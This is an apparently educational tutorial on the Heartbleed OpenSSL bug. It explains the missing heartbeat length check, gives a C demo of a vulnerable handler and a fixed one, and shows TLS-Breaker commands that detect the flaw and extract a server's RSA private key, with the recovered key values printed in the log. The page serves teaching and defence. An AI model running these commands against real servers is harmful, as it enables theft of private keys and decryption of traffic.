HTTPs/TLS Attacks
Heartbleed Bug
The Heartbleed Bug is an example of an implementation flaw in a library providing cryptographic algorithms for TLS that results in a high-impact vulnerability in a huge number of TLS servers.
The Heartbleed Bug
The base functionality of TLS can be extended with a multitude of extensions. One such extension is the Heartbeat extension, which implements a check to see whether the current TLS connection is still alive. More specifically, the client sends a Heartbeat Request message to the server, to which the server responds. If the client receives the expected response, it knows that the server is still there and the connection is still alive.
The Heartbeat Request message consists of an arbitrary payload chosen by the client, as well as the length of the payload. The server then copies the payload into memory and sends the response. So, in normal usage, the client might send ("HackTheBox", 10) to the server, which then replies with "HackTheBox".
However, specific OpenSSL versions that implement the heartbeat extension contained a bug: they did not validate the length sent by the client. That means a malicious client could send a small payload with a large length field, and the server would read data from its memory far beyond the end of the payload sent in the heartbeat message. For instance, an attacker might send the following heartbeat message: ("HackTheBox", 1024). The server would then respond with 1024 bytes of data, starting at the location where "HackTheBox" was stored in the server's memory. This would leak the content of the server's memory to the client. As it turns out, this memory might contain the server's private key, leading to a complete compromise.
Since the heartbeat extension was enabled by default in the vulnerable OpenSSL versions, a huge number of servers were affected by this bug, making it very serious at the time.
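The missing length check described above, shown as an added C example that is neither OpenSSL's code nor part of the original page. The function names, the simplified response layout (type, length, payload) and the arena with marker bytes standing in for adjacent memory are assumptions made for the demonstration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#define HB_REQUEST  1
#define HB_RESPONSE 2
#define HB_PADDING  16  /* RFC 6520: at least 16 bytes of padding */

/* Echo `n` payload bytes back (simplified response: type, length, payload). */
static size_t hb_echo(const uint8_t *rec, size_t n, uint8_t *out, size_t cap) {
    if (rec[0] != HB_REQUEST || 3 + n > cap) return 0;
    out[0] = HB_RESPONSE; out[1] = rec[1]; out[2] = rec[2];
    memcpy(out + 3, rec + 3, n);
    return 3 + n;
}

/* Flawed pattern: trusts the length field and never consults rec_len. */
size_t hb_respond_vulnerable(const uint8_t *rec, size_t rec_len,
                             uint8_t *out, size_t cap) {
    (void)rec_len;
    size_t claimed = ((size_t)rec[1] << 8) | rec[2];
    return hb_echo(rec, claimed, out, cap);   /* may copy past the payload */
}

/* Hardened: claimed length plus header and padding must fit the record. */
size_t hb_respond_checked(const uint8_t *rec, size_t rec_len,
                          uint8_t *out, size_t cap) {
    if (rec_len < 1 + 2 + HB_PADDING) return 0;           /* discard */
    size_t claimed = ((size_t)rec[1] << 8) | rec[2];
    if (1 + 2 + claimed + HB_PADDING > rec_len) return 0; /* discard */
    return hb_echo(rec, claimed, out, cap);
}

/* Constructed demo: the page's 10-byte payload, then marker bytes in the same arena. */
size_t demo(int checked, uint16_t claimed, uint8_t *out, size_t cap) {
    uint8_t arena[2048] = {0};
    size_t rec_len = 3 + 10 + HB_PADDING;
    arena[0] = HB_REQUEST;
    arena[1] = (uint8_t)(claimed >> 8); arena[2] = (uint8_t)(claimed & 0xff);
    memcpy(arena + 3, "HackTheBox", 10);
    memcpy(arena + rec_len, "ADJACENT-SECRET", 15);
    return checked ? hb_respond_checked(arena, rec_len, out, cap)
                   : hb_respond_vulnerable(arena, rec_len, out, cap);
}

int main(void) {
    uint8_t out[2048];
    printf("vulnerable, len=1024: %zu bytes\n", demo(0, 1024, out, sizeof out));
    printf("checked,    len=1024: %zu bytes\n", demo(1, 1024, out, sizeof out));
}
```

With an honest length of 10 both handlers return the same 13-byte response; only the mismatched length separates them.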
Tools & Prevention
To exploit the Heartbleed Bug, we can again use the TLS-Breaker tool collection. We can run the Heartbleed detection tool like so:
$ java -jar apps/heartbleed-1.0.0.jar -h
To identify a vulnerable server, we can pass the IP address and port using the -connect flag. A vulnerable server looks like this:
$ java -jar heartbleed-1.0.0.jar -connect 127.0.0.1:443
14:04:52 [main] INFO : ClientTcpTransportHandler - Connection established from ports 50290 -> 443
14:04:52 [main] INFO : WorkflowExecutor - Connecting to 127.0.0.1:443
14:04:52 [main] INFO : ClientTcpTransportHandler - Connection established from ports 50306 -> 443
14:04:52 [main] INFO : SendAction - Sending messages (client): CLIENT_HELLO,
14:04:52 [main] INFO : ReceiveTillAction - Received Messages (client): SERVER_HELLO, CERTIFICATE, ECDHE_SERVER_KEY_EXCHANGE, SERVER_HELLO_DONE,
14:04:52 [main] INFO : SendDynamicClientKeyExchangeAction - Sending Dynamic Key Exchange (client): ECDH_CLIENT_KEY_EXCHANGE,
14:04:52 [main] INFO : SendAction - Sending messages (client): CHANGE_CIPHER_SPEC, FINISHED,
14:04:52 [main] INFO : ReceiveAction - Received Messages (client): NewSessionTicket, CHANGE_CIPHER_SPEC, FINISHED,
14:04:52 [main] INFO : SendAction - Sending messages (client): HEARTBEAT,
14:04:54 [main] WARN : ReceiveMessageHelper - Could not receive more Records after ParserException - Parsing will fail
14:04:54 [main] WARN : ReceiveMessageHelper - Could not parse Message as a CorrectMessage
14:04:54 [main] WARN : ReceiveMessageHelper - Could not parse Message as a CorrectMessage
14:04:54 [main] INFO : ReceiveAction - Received Messages (client): UNKNOWN_MESSAGE, HEARTBEAT, HEARTBEAT, HEARTBEAT, UNKNOWN_MESSAGE,
14:04:54 [main] INFO : HeartbleedAttacker - Vulnerable. The server responds with a heartbeat message, although the client heartbeat message contains an invalid Length value
14:04:54 [main] INFO : Attacker - Vulnerability status: VULNERABLE
If a server is vulnerable, we can execute the attack to retrieve the server's private key with the -executeAttack flag. It might make sense to increase the number of heartbeat messages sent with the -heartbeats flag. The tool automatically parses the dumped memory to retrieve the private key. Since the attack is not deterministic, it might be necessary to execute the attack multiple times for it to be successful:
$ java -jar heartbleed-1.0.0.jar -connect 127.0.0.1:443 -executeAttack -heartbeats 10
<SNIP>
14:08:06 [main] INFO : HeartbleedAttacker - Prime found!
14:08:06 [main] INFO : HeartbleedAttacker - prime = 138866200437480787133930049744069974606812802444803352675811948587371053684539814119118836631172956605925289638951949511953279399653995160175263273306939560185389009715525288849417218863513613355923931846220909408574261175728746905860940035239178683224848860217455818531522986412928578052409904184896622723843
14:08:06 [main] INFO : HeartbleedAttacker - Calculated values:
14:08:06 [main] INFO : HeartbleedAttacker - p = 138866200437480787133930049744069974606812802444803352675811948587371053684539814119118836631172956605925289638951949511953279399653995160175263273306939560185389009715525288849417218863513613355923931846220909408574261175728746905860940035239178683224848860217455818531522986412928578052409904184896622723843
14:08:06 [main] INFO : HeartbleedAttacker - q = 136690192507231430111637323901426576885920897832706543756714994456952627394763359080038533987434606703453856818247354652300979569056924180599674831142271765923999473224100296160536014207384344623936095054615904056843166655954703022044705375767508334013778530118819683465877541013460546656781639216627269503219
14:08:06 [main] INFO : HeartbleedAttacker - phi = 18981647670547034231720684466754883987173383918913375628854000778181419949416003148871336061999935853734569224941856002549195228999169955980218873514237122232901330355106913794387764659966538735648519040222345160150925008863130063483216154080567177470490396579356519290912902354141136933039264833216145668349545191037200066416105053242918638613319409035015161466775645389858042304432549001661599177251768344892644424435285751066701324945968406135536147739384186086324137050950266639420220546619829499917362097598993992149973145609182607074861589938804570921258237380864172364589630618273058365026729142542341344323556
14:08:06 [main] INFO : HeartbleedAttacker - d = 1961391550192174127854684761415140674140381096157611421923482815353839447906452436397099162486283558928399267456646609537561226342102612904131135258532032161392920169748142579239115953999929815490665897743041662336421626867588031034504780435991896574914337940940268072051851240402273209187816064979168080108383356481131556979566709195737446338547675938555665859789198019136040137412716814002049981359369138526526817557650718010035573378917223039654710964662857747174680807925831296552386187065466612347839787065938131358463435037694502572759856067039756996486881968097596399789446855164947300730289908804137137552209
14:08:06 [main] INFO : HeartbleedAttacker - Encoded private key:
Prevention
Preventing the Heartbleed Bug is relatively easy, as it is a bug specific to the OpenSSL library. Therefore, it is only required to make sure that a web server does not run a vulnerable version of OpenSSL. Vulnerable versions are OpenSSL 1.0.1 through 1.0.1f.